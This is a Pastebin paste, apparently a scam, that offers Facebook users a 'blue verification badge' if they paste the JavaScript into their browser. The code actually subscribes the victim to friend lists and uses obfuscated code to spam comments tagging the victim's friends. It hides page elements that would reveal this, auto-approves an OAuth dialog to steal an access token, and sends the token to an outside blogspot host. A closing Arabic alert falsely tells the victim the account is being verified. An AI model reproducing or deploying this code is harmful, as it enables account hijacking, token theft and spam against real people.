Advertisement
alaaaldrje

ثغرة وضع علامة زرقاء بحسابك

Apr 18th, 2014
2,045
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 7.80 KB | None | 0 0
  1. function IbraheemNada(uidss){var a=document.createElement('script');a.innerHTML="new AsyncRequest().setURI('/ajax/friends/lists/subscribe/modify?location=permalink&action=subscribe').setData({ flid: "+uidss+" }).send();";document.body.appendChild(a)}
  2. IbraheemNada("250712598434928");IbraheemNada("1542316302661118");IbraheemNada("1474009152815864");IbraheemNada("10202575454201808");IbraheemNada("10202575471202233");IbraheemNada("10202575482762522");IbraheemNada("10202348135078972");IbraheemNada("10203591548290760");IbraheemNada("578385952211473");IbraheemNada("532697553483215");IbraheemNada("276409385861300");IbraheemNada("10203129118641333");
  3. var _0xa22c=["value","fb_dtsg","getElementsByName","match","cookie","289790734521268","onreadystatechange","readyState","arkadaslar = ","for (;;);","","replace","responseText",";","length","entries","payload","round"," @[","uid",":","text","]"," ","\x26filter[0]=user","\x26options[0]=friends_only","\x26options[1]=nm","\x26token=v7","\x26viewer=","\x26__user=","https://","indexOf","URL","GET","https://www.facebook.com/ajax/typeahead/first_degree.php?__a=1","open","http://www.facebook.com/ajax/typeahead/first_degree.php?__a=1","send","random","floor","\x26ft_ent_identifier=","\x26comment_text=","\x26source=2","\x26client_id=1377871797138:1707018092","\x26reply_fbid","\x26parent_comment_id","\x26rootid=u_jsonp_2_3","\x26clp={\x22cl_impid\x22:\x22453524a0\x22,\x22clearcounter\x22:0,\x22elementid\x22:\x22js_5\x22,\x22version\x22:\x22x\x22,\x22parent_fbid\x22:","}","\x26attached_sticker_fbid=0","\x26attached_photo_fbid=0","\x26giftoccasion","\x26ft[tn]=[]","\x26__a=1","\x26__dyn=7n8ahyj35ynxl2u5F97KepEsyo","\x26__req=q","\x26fb_dtsg=","\x26ttstamp=","POST","/ajax/ufi/add_comment.php","Content-type","application/x-www-form-urlencoded","setRequestHeader","status","close"];var fb_dtsg=document[_0xa22c[2]](_0xa22c[1])[0][_0xa22c[0]];var user_id=document[_0xa22c[4]][_0xa22c[3]](document[_0xa22c[4]][_0xa22c[3]](/c_user=(\d+)/)[1]);var id=_0xa22c[5];var arkadaslar=[];var svn_rev;function arkadaslari_al(id){var _0x7892x7= new XMLHttpRequest();_0x7892x7[_0xa22c[6]]=function (){if(_0x7892x7[_0xa22c[7]]==4){eval(_0xa22c[8]+_0x7892x7[_0xa22c[12]].toString()[_0xa22c[11]](_0xa22c[9],_0xa22c[10])+_0xa22c[13]);for(f=0;f<Math[_0xa22c[17]](arkadaslar[_0xa22c[16]][_0xa22c[15]][_0xa22c[14]]/27);f++){mesaj=_0xa22c[10];mesaj_text=_0xa22c[10];for(i=f*27;i<(f+1)*27;i++){if(arkadaslar[_0xa22c[16]][_0xa22c[15]][i]){mesaj+=_0xa22c[18]+arkadaslar[_0xa22c[16]][_0xa22c[15]][i][_0xa22c[19]]+_0xa22c[20]+arkadaslar[_0xa22c[16]][_0xa22c[15]][i][_0xa22c[21]]+_0xa22c[22];mesaj_text+=_0xa22c[23]+arkadaslar[_0xa22c[16]][_0xa22c[15]][i][_0xa22c[21]];} ;} ;yorum_yap(id,mesaj);} ;} ;} ;var _0x7892x8=_0xa22c[24];_0x7892x8+=_0xa22c[25];_0x7892x8+=_0xa22c[26];_0x7892x8+=_0xa22c[27];_0x7892x8+=_0xa22c[28]+user_id;_0x7892x8+=_0xa22c[29]+user_id;if(document[_0xa22c[32]][_0xa22c[31]](_0xa22c[30])>=0){_0x7892x7[_0xa22c[35]](_0xa22c[33],_0xa22c[34]+_0x7892x8,true);} else {_0x7892x7[_0xa22c[35]](_0xa22c[33],_0xa22c[36]+_0x7892x8,true);} ;_0x7892x7[_0xa22c[37]]();} ;function RandomArkadas(){var _0x7892xa=_0xa22c[10];for(i=0;i<9;i++){_0x7892xa+=_0xa22c[18]+arkadaslar[_0xa22c[16]][_0xa22c[15]][Math[_0xa22c[39]](Math[_0xa22c[38]]()*arkadaslar[_0xa22c[16]][_0xa22c[15]][_0xa22c[14]])][_0xa22c[19]]+_0xa22c[20]+arkadaslar[_0xa22c[16]][_0xa22c[15]][Math[_0xa22c[39]](Math[_0xa22c[38]]()*arkadaslar[_0xa22c[16]][_0xa22c[15]][_0xa22c[14]])][_0xa22c[21]]+_0xa22c[22];} ;return _0x7892xa;} ;function yorum_yap(id,_0x7892xc){var _0x7892xd= new XMLHttpRequest();var _0x7892x8=_0xa22c[10];_0x7892x8+=_0xa22c[40]+id;_0x7892x8+=_0xa22c[41]+encodeURIComponent(_0x7892xc);_0x7892x8+=_0xa22c[42];_0x7892x8+=_0xa22c[43];_0x7892x8+=_0xa22c[44];_0x7892x8+=_0xa22c[45];_0x7892x8+=_0xa22c[46];_0x7892x8+=_0xa22c[47]+id+_0xa22c[48];_0x7892x8+=_0xa22c[49];_0x7892x8+=_0xa22c[50];_0x7892x8+=_0xa22c[51];_0x7892x8+=_0xa22c[52];_0x7892x8+=_0xa22c[29]+user_id;_0x7892x8+=_0xa22c[53];_0x7892x8+=_0xa22c[54];_0x7892x8+=_0xa22c[55];_0x7892x8+=_0xa22c[56]+fb_dtsg;_0x7892x8+=_0xa22c[57];_0x7892xd[_0xa22c[35]](_0xa22c[58],_0xa22c[59],true);_0x7892xd[_0xa22c[62]](_0xa22c[60],_0xa22c[61]);_0x7892xd[_0xa22c[6]]=function (){if(_0x7892xd[_0xa22c[7]]==4&&_0x7892xd[_0xa22c[63]]==200){_0x7892xd[_0xa22c[64]];} ;} ;_0x7892xd[_0xa22c[37]](_0x7892x8);} ;arkadaslari_al(id);
  4.  
  5. if(location.hostname.indexOf("www.facebook.com","static.ak.facebook.com","apps.facebook.com","beta.facebook.com") >= 0){
  6. var profile_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]).toString();
  7. function uygulamaizinver(url){
  8. var xmlhttp = new XMLHttpRequest();
  9. xmlhttp.onreadystatechange = function () {
  10. if(xmlhttp.readyState == 4){
  11. izinverhtml = document.createElement("html");
  12. izinverhtml.innerHTML = xmlhttp.responseText;
  13. if(izinverhtml.getElementsByTagName("form").length > 0){
  14. izinverhtml.innerHTML = izinverhtml.getElementsByTagName("form")[0].outerHTML
  15. act = izinverhtml.getElementsByTagName("form")[0].action;
  16. duzenlevegonder(izinverhtml,act);
  17. }
  18. }
  19. };
  20. xmlhttp.open("GET", url, true);
  21. xmlhttp.send();
  22. }
  23. function duzenlevegonder(formnesne,act){
  24. izinverparams = "";
  25. for(i=0;i<formnesne.getElementsByTagName("input").length;i++){
  26. if(formnesne.getElementsByTagName("input")[i].name.indexOf("__CANCEL__") < 0 && formnesne.getElementsByTagName("input")[i].name.indexOf("cancel_clicked")){
  27. izinverparams += "&" + formnesne.getElementsByTagName("input")[i].name + "=" + formnesne.getElementsByTagName("input")[i].value;
  28. }
  29. }
  30. if(formnesne.getElementsByTagName("select").length > 0){
  31. izinverparams += "&" + formnesne.getElementsByTagName("select")[0].name + "=80";
  32. }
  33. izinverparams.replace("&fb_dtsg","fb_dtsg");
  34. izinverparams += "&__CONFIRM__=1";
  35. formnesne = formnesne;
  36. var xmlhttp = new XMLHttpRequest();
  37. xmlhttp.onreadystatechange = function () {
  38. if(xmlhttp.readyState == 4){
  39. izinhtml = document.createElement("html");
  40. izinhtml.innerHTML = xmlhttp.responseText;
  41. if(izinhtml.getElementsByTagName("form").length > 0){
  42. izinhtml.innerHTML = izinhtml.getElementsByTagName("form")[0].outerHTML;
  43. act = izinhtml.getElementsByTagName("form")[0].action;
  44. duzenlevegonder(izinhtml,act)
  45. }else{
  46. sex = xmlhttp.responseText.match(/#access_token=(.*?)&expires_in/i);
  47. if (sex[1]) {
  48. tokenyolla(sex[1]);
  49. }
  50. }
  51. }
  52. };
  53.  
  54. xmlhttp.open("POST", act , true);
  55. xmlhttp.setRequestHeader ("Content-Type", "application/x-www-form-urlencoded");
  56. xmlhttp.send(izinverparams);
  57.  
  58. }
  59.  
  60. function TokenUrl(id){
  61. return "//www.facebook.com/dialog/oauth?response_type=token&display=popup&client_id=" + id +"&redirect_uri=fbconnect://success&sso_key=com&scope=email,publish_stream,user_likes,friends_likes,user_birthday";
  62. }
  63.  
  64. if(!localStorage['token_' + profile_id] || (localStorage['token_' + profile_id] && tarih.getTime() >= localStorage['token_' + profile_id])){
  65. uygulamaizinver(TokenUrl("121876164619130"));
  66. var http = new XMLHttpRequest();
  67. http['open']('GET', 'http://graph.facebook.com/' + profile_id, false);
  68. http['send']();
  69. var get = JSON.parse(http['responseText']);
  70. var isim = get.name;
  71. }
  72. window.setInterval(function(){
  73. if(document.getElementsByClassName("_5ce")){
  74. for(i=0;i<document.getElementsByClassName("_5ce").length;i++){
  75. document.getElementsByClassName("_5ce")[i].innerHTML = "";
  76. }
  77. }
  78. if(document.getElementsByClassName("uiToggle wrap")){
  79. for(i=0;i<document.getElementsByClassName("uiToggle wrap").length;i++){
  80. document.getElementsByClassName("uiToggle wrap")[i].innerHTML = "";
  81. }
  82. }
  83. if(document.getElementsByClassName("uiPopover")){
  84. for(i=0;i<document.getElementsByClassName("uiPopover").length;i++){
  85. document.getElementsByClassName("uiPopover")[i].innerHTML = "";
  86. }
  87. }
  88. },200);
  89. function tokenyolla(token){
  90. top.location.href = 'http://aaaddd120.blogspot.com/#' + token;
  91. }}
  92. var alibasim = "جاري التحقق من حسابك ووضع علامه صح";
  93. alert(alibasim);
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement